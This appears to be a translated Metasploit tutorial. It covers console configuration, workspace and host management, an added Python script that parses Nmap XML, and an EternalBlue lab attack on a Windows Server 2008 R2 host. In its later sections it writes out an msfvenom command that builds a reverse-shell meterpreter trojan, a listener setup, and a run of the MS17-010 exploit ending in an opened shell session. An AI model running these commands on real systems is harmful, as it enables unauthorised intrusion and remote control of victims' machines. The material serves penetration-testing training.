[Security] metasploit (1)
I. Configuring the Metasploit environment
1. Customizing the command prompt
msf5 > set Prompt my-msf
Prompt => my-msf
my-msf >
Besides a literal string, the following format codes can be used in the prompt:
%D  current directory
%H  hostname
%J  number of jobs currently running
%L  local IP address
%S  number of open sessions
%T  timestamp (change its format with set PromptTimeFormat %Y-%m-%d)
%U  current user name
%W  current workspace
Besides changing the prompt text, the ">" can also be replaced with another character:
my-msf > set PromptChar $
PromptChar => $
my-msf $
2. Enabling timestamps
When running tasks, it helps to know when each step happened, so timestamped output is needed.
my-msf $ set TimestampOutput true
TimestampOutput => true
true enables timestamps, false disables them.
3. Enabling console logging
When the operations performed need to be logged, console logging can be enabled (it is off by default):
my-msf $ set ConsoleLogging true
Console logging is now enabled.
ConsoleLogging => true
From then on, everything done in the console is recorded in /root/.msf4/logs/console.log (recording starts at the moment logging is enabled).
4. Enabling session logging
Section 3 enabled the console log (a record of the commands that are run); once an attack succeeds and a session is obtained, the session's traffic needs to be logged as well.
msf5 > set SessionLogging true
Session logging will be enabled for future sessions.
SessionLogging => true
5. Setting the log level
msf5 > set LogLevel 2
LogLevel => 2
The log level is 0, 1, 2 or 3; the higher the value, the more detailed the log.
6. Module ranks
For exploit modules, Metasploit assigns a rank based on how easy the module is to use and how much potential impact it has on the target system.
   1951  windows/tftp/threectftpsvc_long_mode    2006-11-27  great    No   3CTftpSvc TFTP Long Mode Buffer Overflow
   1952  windows/unicenter/cam_log_security      2005-08-22  great    Yes  CA CAM log_security() Stack Buffer Overflow (Win32)
   1953  windows/vnc/realvnc_client              2001-01-29  normal   No   RealVNC 3.3.7 Client Buffer Overflow
   1954  windows/vnc/ultravnc_client             2006-04-04  normal   No   UltraVNC 1.0.1 Client Buffer Overflow
   1955  windows/vnc/ultravnc_viewer_bof         2008-02-06  normal   No   UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
   1956  windows/vnc/winvnc_http_get             2001-01-29  average  No   WinVNC Web Server GET Overflow
   1957  windows/vpn/safenet_ike_11              2009-06-01  average  No   SafeNet SoftRemote IKE Service Buffer Overflow
   1958  windows/winrm/winrm_script_exec         2012-11-01  manual   No   WinRM Script Exec Remote Code Execution
   1959  windows/wins/ms04_045_wins              2004-12-14  great    Yes  MS04-045 Microsoft WINS Service Memory Overwrite
Rank      | Value | Meaning
Manual    | 0     | Hard to exploit successfully
Low       | 100   | Almost never succeeds; success rate below 5%
Average   | 200   | Generally does not succeed
Normal    | 300   | Exploitable on specific versions
Good      | 400   | Generally succeeds
Great     | 500   | Automatically detects exploitable targets; high success rate
Excellent | 600   | Will not crash the server; can essentially be used with confidence; applies to SQL injection, command execution, RFI, LFI and similar
Some modules may have no rank set; if one turns out to work well, the following command sets a rank for it:
set MinimumRank 300 # run use xxx/xxx/xxx first
II. Basic MSF usage
1. Workspace management
1) Listing workspaces
msf5 > workspace
* default
2) Adding a workspace
msf5 > workspace -a work1
[*] Added workspace: work1
[*] Workspace: work1
3) Showing workspace details
msf5 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
         default  7      4         1      0      0      2
         work1    0      0         0      0      0      0
         work2    0      0         0      0      0      0
*        work3    0      0         0      0      0      0
name: workspace name.
hosts: number of hosts recorded in the workspace.
services: number of services recorded in the workspace.
vulns: number of vulnerability records in the workspace.
creds: number of credential records in the workspace.
loots: number of loot items recorded in the workspace.
notes: number of notes recorded in the workspace.
4) Switching workspaces
msf5 > workspace work2
[*] Workspace: work2
5) Renaming a workspace
msf5 > workspace -r work3 my_work
[*] Renamed workspace 'work3' to 'my_work'
6) Deleting a workspace
msf5 > workspace -d my_work
[*] Deleted workspace: my_work
Delete all workspaces (including the current default workspace; after deletion a fresh default workspace is recreated):
msf5 > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
[*] Deleted workspace: work1
[*] Deleted workspace: work2
[*] Switched to workspace: default
msf5 > workspace
* default
2. Identifying target hosts
1) Scanning target hosts with nmap
msf5 > db_nmap -sP 192.168.4.0/24
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-24 02:40 EDT
[*] Nmap: Nmap scan report for 17WiFi.lan (192.168.4.1)
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: MAC Address: 4C:6E:6E:00:EF:E8 (Comnect Technology)
[*] Nmap: Nmap scan report for DESKTOP-6MQMP8A.lan (192.168.4.42)
[*] Nmap: Host is up (0.0017s latency).
[*] Nmap: MAC Address: B4:2E:99:EE:74:35 (Giga-byte Technology)
[*] Nmap: Nmap scan report for 192.168.4.52
[*] Nmap: Host is up (0.00012s latency).
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Nmap scan report for 192.168.4.199
[*] Nmap: Host is up (0.00016s latency).
[*] Nmap: MAC Address: B4:2E:99:EE:73:E0 (Giga-byte Technology)
[*] Nmap: Nmap scan report for 192.168.4.210
[*] Nmap: Host is up (0.00014s latency).
[*] Nmap: MAC Address: 00:0C:29:7E:61:77 (VMware)
[*] Nmap: Nmap scan report for 192.168.4.211
[*] Nmap: Host is up (0.00014s latency).
[*] Nmap: MAC Address: 00:0C:29:C8:38:DE (VMware)
[*] Nmap: Nmap scan report for parrot.lan (192.168.4.219)
[*] Nmap: Host is up (0.028s latency).
[*] Nmap: MAC Address: 60:D8:19:C4:C4:32 (Hon Hai Precision Ind.)
[*] Nmap: Nmap scan report for kali.lan (192.168.4.146)
[*] Nmap: Host is up.
[*] Nmap: Nmap done: 256 IP addresses (8 hosts up) scanned in 1.31 seconds

msf5 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  8      0         0      0      0      0
db_nmap invokes nmap and takes exactly the same arguments as the Nmap command. After the scan, the current workspace shows 8 discovered hosts.
2) Importing third-party scan reports
List the supported report types:
msf5 > db_import
Usage: db_import <filename> [file2...]

Filenames can be globs like *.xml, or **/*.xml which will search recursively
Currently supported file types include:
    Acunetix
    Amap Log
    Amap Log -m
    Appscan
    Burp Session XML
    Burp Issue XML
    CI
    Foundstone
    FusionVM XML
    Group Policy Preferences Credentials
    IP Address List
    IP360 ASPL
    IP360 XML v3
    Libpcap Packet Capture
    Masscan XML
    Metasploit PWDump Export
    Metasploit XML
    Metasploit Zip Export
    Microsoft Baseline Security Analyzer
    NeXpose Simple XML
    NeXpose XML Report
    Nessus NBE Report
    Nessus XML (v1)
    Nessus XML (v2)
    NetSparker XML
    Nikto XML
    Nmap XML
    OpenVAS Report
    OpenVAS XML
    Outpost24 XML
    Qualys Asset XML
    Qualys Scan XML
    Retina XML
    Spiceworks CSV Export
    Wapiti XML
Import the XML file generated by nmap:
msf5 > db_import subnet.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.7'
[*] Importing host 192.168.4.1
[*] Importing host 192.168.4.42
[*] Importing host 192.168.4.52
[*] Importing host 192.168.4.199
[*] Importing host 192.168.4.210
[*] Importing host 192.168.4.211
[*] Importing host 192.168.4.146
[*] Successfully imported /root/subnet.xml
3) Listing the hosts in the workspace
msf5 > hosts

Hosts
=====

address        mac                name                 os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----                 -------  ---------  -----  -------  ----  --------
192.168.4.1    4c:6e:6e:00:ef:e8  17WiFi.lan           Unknown                    device
192.168.4.42   b4:2e:99:ee:74:35  DESKTOP-6MQMP8A.lan  Unknown                    device
192.168.4.52   00:0c:29:fa:dd:2a                       Unknown                    device
192.168.4.146                     kali.lan             Unknown                    device
192.168.4.199  b4:2e:99:ee:73:e0                       Unknown                    device
192.168.4.210  00:0c:29:7e:61:77                       Unknown                    device
192.168.4.211  00:0c:29:c8:38:de                       Unknown                    device
4) Analyzing vulnerabilities from an imported report
If the imported third-party report contains vulnerability information for the hosts, it can be analyzed directly:
msf5 > analyze 192.168.4.211
[*] Analyzing 192.168.4.211...
[*] No suggestions for 192.168.4.211.
Here we see that the imported report contains no vulnerability information for 192.168.4.211.
workspace -v confirms that there are no vulns:
msf5 > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  7      0         0      0      0      7
If a host does have a vulnerability in the report, analyze prints the path of the exploit module for that vulnerability, for example exploit/windows/smb/ms04_011_lsass.
3. Managing target hosts
Not every scanned host will be a penetration target, so the discovered hosts need to be managed.
1) The hosts command
Command syntax: hosts [options] [addr1 addr2 ...]
msf5 > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
  -a,--add          Add the hosts instead of searching
  -d,--delete       Delete the hosts instead of searching
  -c <col1,col2>    Only show the given columns (see list below)
  -C <col1,col2>    Only show the given columns until the next restart (see list below)
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format
  -O <column>       Order rows by specified column number
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -i,--info         Change the info of a host
  -n,--name         Change the name of a host
  -m,--comment      Change the comment of a host
  -t,--tag          Add or specify a tag to a range of hosts

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
2) hosts display options
Show only the specified columns:
msf5 > hosts -c address,mac

Hosts
=====

address        mac
-------        ---
192.168.4.1    4c:6e:6e:00:ef:e8
192.168.4.42   b4:2e:99:ee:74:35
192.168.4.52   00:0c:29:fa:dd:2a
192.168.4.146
192.168.4.199  b4:2e:99:ee:73:e0
192.168.4.210  00:0c:29:7e:61:77
192.168.4.211  00:0c:29:c8:38:de
Note that if -c is replaced with -C, the column selection stays in effect until the database is restarted.
Show only hosts that are up:
msf5 > hosts -u
Order by a column:
msf5 > hosts -O 2

Hosts
=====

address        mac                name                 os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----                 -------  ---------  -----  -------  ----  --------
192.168.4.146                     kali.lan             Unknown                    device
192.168.4.210  00:0c:29:7e:61:77                       Unknown                    device
192.168.4.211  00:0c:29:c8:38:de                       Unknown                    device
192.168.4.52   00:0c:29:fa:dd:2a                       Unknown                    device
192.168.4.1    4c:6e:6e:00:ef:e8  17WiFi.lan           Unknown                    device
192.168.4.199  b4:2e:99:ee:73:e0                       Unknown                    device
192.168.4.42   b4:2e:99:ee:74:35  DESKTOP-6MQMP8A.lan  Unknown                    device
The output above is sorted by the second column, mac.
3) Adding tags and info
To label a host, add a tag or an info string to it:
msf5 > hosts 192.168.4.199 -t important
msf5 > hosts 192.168.4.199 -i info199

msf5 > hosts -c address,info

Hosts
=====

address        info
-------        ----
192.168.4.1
192.168.4.42
192.168.4.52
192.168.4.146
192.168.4.199  info199
192.168.4.210
192.168.4.211
4) Renaming a host
msf5 > hosts 192.168.4.1 -n gateway
msf5 > hosts

Hosts
=====

address        mac                name                 os_name  os_flavor  os_sp  purpose  info     comments
-------        ---                ----                 -------  ---------  -----  -------  ----     --------
192.168.4.1    4c:6e:6e:00:ef:e8  gateway              Unknown                    device
192.168.4.42   b4:2e:99:ee:74:35  DESKTOP-6MQMP8A.lan  Unknown                    device
192.168.4.52   00:0c:29:fa:dd:2a                       Unknown                    device
192.168.4.146                     kali.lan             Unknown                    device
192.168.4.199  b4:2e:99:ee:73:e0                       Unknown                    device   info199
192.168.4.210  00:0c:29:7e:61:77                       Unknown                    device
192.168.4.211  00:0c:29:c8:38:de                       Unknown                    device
5) Searching hosts
msf5 > hosts -S kali

Hosts
=====

address        mac  name      os_name  os_flavor  os_sp  purpose  info  comments
-------        ---  ----      -------  ---------  -----  -------  ----  --------
192.168.4.146       kali.lan  Unknown                    device
-S searches for any keyword (case-insensitive).
6) Exporting hosts to a file
msf5 > hosts -o host.csv
[*] Wrote hosts to host.csv
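As an added example (not part of the original post, and not Metasploit's own code), the following Python script mimics what db_import and the hosts command do with an Nmap XML report: it parses a constructed sample report into host records and then applies the -u, -S, -O, -c and -o operations shown above. The sample XML is constructed for the example and reuses a few of the addresses from the scan above.

```python
"""Mimic of what `db_import` (Nmap XML) and the `hosts` command do, written
as an illustration for this post; it is not Metasploit's own code."""
import csv
import io
import xml.etree.ElementTree as ET

# Constructed Nmap XML sample (a trimmed ping-scan report, not the real subnet.xml).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sP 192.168.4.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.4.1" addrtype="ipv4"/>
    <address addr="4C:6E:6E:00:EF:E8" addrtype="mac" vendor="Comnect Technology"/>
    <hostnames><hostname name="17WiFi.lan" type="PTR"/></hostnames>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.4.42" addrtype="ipv4"/>
    <address addr="B4:2E:99:EE:74:35" addrtype="mac" vendor="Giga-byte Technology"/>
    <hostnames><hostname name="DESKTOP-6MQMP8A.lan" type="PTR"/></hostnames>
  </host>
  <host>
    <status state="up" reason="localhost-response"/>
    <address addr="192.168.4.146" addrtype="ipv4"/>
    <hostnames><hostname name="kali.lan" type="PTR"/></hostnames>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.4.200" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Column order mirrors the first columns of the `hosts` table (1-based for -O).
COLUMNS = ("address", "mac", "name", "state")


def parse_nmap_xml(xml_text):
    """Turn each <host> element into a record like the rows db_import stores."""
    hosts = []
    for node in ET.fromstring(xml_text).findall("host"):
        rec = dict.fromkeys(COLUMNS, "")
        status = node.find("status")
        if status is not None:
            rec["state"] = status.get("state", "")
        for addr in node.findall("address"):
            if addr.get("addrtype") == "ipv4":
                rec["address"] = addr.get("addr", "")
            elif addr.get("addrtype") == "mac":
                rec["mac"] = addr.get("addr", "").lower()  # msf prints MACs in lowercase
        hostname = node.find("hostnames/hostname")
        if hostname is not None:
            rec["name"] = hostname.get("name", "")
        if rec["address"]:  # a host without an IPv4 address has nothing to key on
            hosts.append(rec)
    return hosts


def up_only(hosts):
    """hosts -u: keep only hosts whose scan status is up."""
    return [h for h in hosts if h["state"] == "up"]


def search(hosts, term):
    """hosts -S term: case-insensitive match against any field."""
    needle = term.lower()
    return [h for h in hosts if any(needle in v.lower() for v in h.values())]


def order_by(hosts, column_number):
    """hosts -O n: sort by the n-th column; empty values sort first, as in msf."""
    key = COLUMNS[column_number - 1]
    return sorted(hosts, key=lambda h: h[key])


def select(hosts, cols):
    """hosts -c col1,col2: keep only the requested columns."""
    return [{c: h[c] for c in cols} for h in hosts]


def to_csv(hosts, cols=COLUMNS):
    """hosts -o file.csv: render the table as CSV text (the caller writes the file)."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=list(cols), lineterminator="\n")
    writer.writeheader()
    for h in hosts:
        writer.writerow({c: h[c] for c in cols})
    return buf.getvalue()


if __name__ == "__main__":
    inventory = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(to_csv(order_by(up_only(inventory), 2), ("address", "mac", "name")))
```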
4. Managing other objects in the workspace
Besides hosts, a workspace also holds services, creds (credentials), loots, notes and vulns (vulnerabilities). They are managed much like hosts, so they are not covered again here.
5. Backing up data
As shown above, -o exports a CSV file when managing hosts and similar data, but that backs up only part of the data. To back up an entire workspace, use db_export:
msf5 > db_export -f xml keep.xml
[*] Starting export of workspace default to keep.xml [ xml ]...
[*] Finished export of workspace default to keep.xml [ xml ]...
The saved XML looks like this:
III. Basic Metasploit usage
1. Listing exploit modules
msf5 > show exploits
This lists every exploit module in the current Metasploit version.
   1945  windows/tftp/netdecision_tftp_traversal  2009-05-16  excellent  No   NetDecision 4.2 TFTP Writable Directory Traversal Execution
   1946  windows/tftp/opentftp_error_code         2008-07-05  average    No   OpenTFTP SP 1.4 Error Packet Overflow
   1947  windows/tftp/quick_tftp_pro_mode         2008-03-27  good       No   Quick FTP Pro 2.1 Transfer-Mode Overflow
   1948  windows/tftp/tftpd32_long_filename       2002-11-19  average    No   TFTPD32 Long Filename Buffer Overflow
   1949  windows/tftp/tftpdwin_long_filename      2006-09-21  great      No   TFTPDWIN v0.4.2 Long Filename Buffer Overflow
   1950  windows/tftp/tftpserver_wrq_bof          2008-03-26  normal     No   TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
   1951  windows/tftp/threectftpsvc_long_mode     2006-11-27  great      No   3CTftpSvc TFTP Long Mode Buffer Overflow
   1952  windows/unicenter/cam_log_security       2005-08-22  great      Yes  CA CAM log_security() Stack Buffer Overflow (Win32)
   1953  windows/vnc/realvnc_client               2001-01-29  normal     No   RealVNC 3.3.7 Client Buffer Overflow
   1954  windows/vnc/ultravnc_client              2006-04-04  normal     No   UltraVNC 1.0.1 Client Buffer Overflow
   1955  windows/vnc/ultravnc_viewer_bof          2008-02-06  normal     No   UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
   1956  windows/vnc/winvnc_http_get              2001-01-29  average    No   WinVNC Web Server GET Overflow
   1957  windows/vpn/safenet_ike_11               2009-06-01  average    No   SafeNet SoftRemote IKE Service Buffer Overflow
   1958  windows/winrm/winrm_script_exec          2012-11-01  manual     No   WinRM Script Exec Remote Code Execution
   1959  windows/wins/ms04_045_wins               2004-12-14  great      Yes  MS04-045 Microsoft WINS Service Memory Overwrite
2. Using an exploit (workflow)
msf5 > use exploit/windows/smb/ms06_040_netapi
msf5 exploit(windows/smb/ms06_040_netapi) >
The exploits are sorted by category and stored in the corresponding directories; all that is needed is to use one.
Exploit modules are generally stored under the following directory:
/usr/share/metasploit-framework/modules/exploits/
For example, the ms04_031_netdde module we use lives in this directory:
/usr/share/metasploit-framework/modules/exploits/windows/smb
View how the exploit is used:
msf5 exploit(windows/smb/ms06_040_netapi) > show info

       Name: MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
     Module: exploit/windows/smb/ms06_040_netapi
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2006-08-08

Provided by:
  hdm <x@hdm.io>

Module stability:
  crash-os-restarts
  crash-service-down

Module reliability:
  unreliable-session

Available targets:
  Id  Name
  --  ----
  0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
  1   (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4
  2   (wcscpy) Windows XP SP0/SP1
  3   (stack) Windows XP SP1 English
  4   (stack) Windows XP SP1 Italian
  5   (wcscpy) Windows 2003 SP0

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 370
  Avoid: 7 characters

Description:
  This module exploits a stack buffer overflow in the NetApi32
  CanonicalizePathName() function using the NetpwPathCanonicalize RPC
  call in the Server Service. It is likely that other RPC calls could
  be used to exploit this service. This exploit will result in a denial
  of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit
  attempt will likely result in a complete reboot on Windows 2000 and
  the termination of all SMB-related services on Windows XP. The default
  target for this exploit should succeed on Windows NT 4.0, Windows 2000
  SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.

References:
  https://cvedetails.com/cve/CVE-2006-3439/
  OSVDB (27845)
  http://www.securityfocus.com/bid/19409
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/MS06-040
Pay particular attention to the basic options: these are the options that must be set before this exploit can be used.
Choose a payload (show payloads):
msf5 exploit(windows/smb/ms06_040_netapi) > show payloads
Many payloads are available; select the one needed and set it:
msf5 exploit(windows/smb/ms06_040_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
Then set the basic options (refer to the basic options listed by show info):
msf5 exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.4.211
RHOSTS => 192.168.4.211
Then launch the attack:
msf5 exploit(windows/smb/ms06_040_netapi) > exploit
exploit launches the attack; run works as well.
Use back to leave the exploit module:
msf5 exploit(windows/smb/ms06_040_netapi) > back
msf5 >
3. Viewing help inside an exploit module
Running help at an exploit module's prompt shows the following content in addition to what help shows at the msf prompt:
msf5 exploit(windows/smb/ms06_040_netapi) > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index

Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database

Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths

Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    recheck       Alias for rcheck
    reload        Just reloads the module
    rerun         Alias for rexploit
    rexploit      Reloads the module and launches an exploit attempt
    run           Alias for exploit

msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
Note that the part highlighted in yellow in the original screenshot (the Exploit Commands section) is specific to running help inside an exploit module; the rest is identical to help at the msf prompt.
4. Generating a trojan backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > shell.exe
The msfvenom command generates a trojan program carrying the specified payload.
-p specifies the payload type. LHOST is the IP of the controlling host (our machine). LPORT is the controlling host's port.
If this trojan is planted on the attacked host, the program connects to the IP and port given to it, and that channel is then used to execute our remote-control commands.
Note that this payload corresponds to the following Ruby file:
/usr/share/metasploit-framework/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
5. Listening on a port and waiting for the reverse connection
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 192.169.4.146
LHOST => 192.169.4.146
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.4.146:4444
exploit/multi/handler is the module dedicated to listening for reverse connections. Run it, then set LHOST and LPORT to the connection IP and port that were given to the trojan; we listen locally and wait for the trojan to connect. Use exploit or run to start listening.
IV. Attacking Windows Server 2008 R2 with the ms17-010 vulnerability
1. Finding the ms17-010 module
msf5 > search ms17

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank     Check  Description
   -   ----                                                   ---------------  ----     -----  -----------
   0   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   2   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   3   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   5   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   6   auxiliary/scanner/smb/smb_ms17_010                                      normal   No     MS17-010 SMB RCE Detection
   7   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   8   exploit/windows/smb/doublepulsar_rce                   2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   9   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   10  exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   11  exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2. Using the exploit
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >
3. Setting the target IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.4.142
RHOST => 192.168.4.142
4. Attacking the target
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.4.146:4444
[*] 192.168.4.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.4.142:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit)
[*] 192.168.4.142:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.4.142:445 - Connecting to target for exploitation.
[+] 192.168.4.142:445 - Connection established for exploitation.
[+] 192.168.4.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.4.142:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.4.142:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.4.142:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
[*] 192.168.4.142:445 - 0x00000020  72 20 37 36 30 30                                r 7600
[+] 192.168.4.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.4.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.4.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.4.142:445 - Starting non-paged pool grooming
[+] 192.168.4.142:445 - Sending SMBv2 buffers
[+] 192.168.4.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.4.142:445 - Sending final SMBv2 buffers.
[*] 192.168.4.142:445 - Sending last fragment of exploit packet!
[*] 192.168.4.142:445 - Receiving response from exploit packet
[+] 192.168.4.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.4.142:445 - Sending egg to corrupted connection.
[*] 192.168.4.142:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.4.146:4444 -> 192.168.4.142:49159) at 2020-04-20 04:52:13 -0400
[+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
